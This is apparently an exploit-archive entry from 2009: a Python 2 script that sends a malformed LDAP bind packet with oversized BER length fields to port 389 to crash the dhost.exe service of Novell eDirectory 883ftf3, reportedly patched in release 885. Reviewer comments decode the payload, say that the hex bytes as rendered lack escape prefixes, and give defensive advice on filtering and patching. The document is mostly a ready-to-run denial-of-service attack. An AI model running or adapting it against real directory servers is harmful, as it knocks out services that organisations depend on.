
# Title : Novell eDirectory 883ftf3 nldap module Denial of Service
# Published : 2009-11-16
# Author : Matteo Memelli


#!/usr/bin/python
# 22/03/2009
# Novell eDirectory 883ftf3 nldap module DOS
# Matteo Memelli - offensive-security.com
# ryujin ___ @ ___ offensive-security.com
#
# A malformed LDAP bind packet can crash the dhost.exe service.
# 24/03/2009 Vendor notification; patched in 885 release
#

import sys
from socket import *

# Request body for the denial-of-service condition described in the header:
# a malformed LDAP bind packet that crashes dhost.exe on eDirectory 883ftf3
# (the author reports it as patched in the 885 release).
#
# NOTE(review): as rendered on this page the hex pairs carry no escape
# prefix, so the literal below is plain ASCII text exactly as shown. The
# analysis notes that follow read each "xNN" pair as the byte value the
# author evidently intended; treat that reading as an interpretation.
#
# Read as bytes, the message is 128 bytes long:
#   - 30 7E looks like a BER SEQUENCE header; its length (0x7E = 126) matches
#     the number of bytes that follow, so the outer envelope is well-formed.
#   - Two inner fields use the five-byte form 84 FF FF FF FF, i.e. a BER
#     long-form length claiming 0xFFFFFFFF bytes, far more than the message
#     holds. Presumably this is the malformed part; the page does not say
#     which field the nldap module mishandles.
#   - The remainder is printable text, "dc=uaregonnacrash,dc=com" joined
#     with "+" and repeated, followed by 80 00.
#
# Defensive takeaway: an LDAP message whose inner BER length exceeds the
# enclosing length (or the bytes actually received) is never valid. A
# protocol-aware IDS or LDAP proxy can reject it before it reaches the
# directory service, and affected hosts should run the fixed release.
payload = (
          "x30x7Ex02x02x01x60x77x02x84xFFxFFxFFxFFx03x04x84"
          "xFFxFFxFFxFFx64x63x3Dx75x61x72x65x67x6fx6ex6ex61"
          "x63x72x61x73x68x2Cx64x63x3Dx63x6Fx6Dx2Bx64x63x3D"
          "x75x61x72x65x67x6fx6ex6ex61x63x72x61x73x68x2Cx64"
          "x63x3Dx63x6Fx6Dx2Bx64x63x3Dx75x61x72x65x67x6fx6e"
          "x6ex61x63x72x61x73x68x2Cx64x63x3Dx63x6Fx6Dx2Bx64"
          "x63x3Dx75x61x72x65x67x6fx6ex6ex61x63x72x61x73x68"
          "x2Cx64x63x3Dx63x6Fx6Dx2Bx64x63x3Dx63x6Fx6Dx80x00"
          )

# Python 2 script (print statements). The message goes out over a plain TCP
# connection as the first data on the socket, with no earlier LDAP exchange,
# so the condition is reachable without authenticating. That makes network
# exposure of port 389 the main risk factor until the fix is applied.
s = socket(AF_INET, SOCK_STREAM)
print 'connecting...'
# Host is taken from the first command-line argument; the port is fixed at
# 389. argv is not validated, so a missing argument raises IndexError.
s.connect((sys.argv[1], 389))
print 'sending payload...'
s.send(payload)
# Prints up to 1024 bytes of whatever the server returns. No timeout is set
# on the socket, so this call blocks until data arrives or the peer closes.
print s.recv(1024)
s.close()
print 'Done!'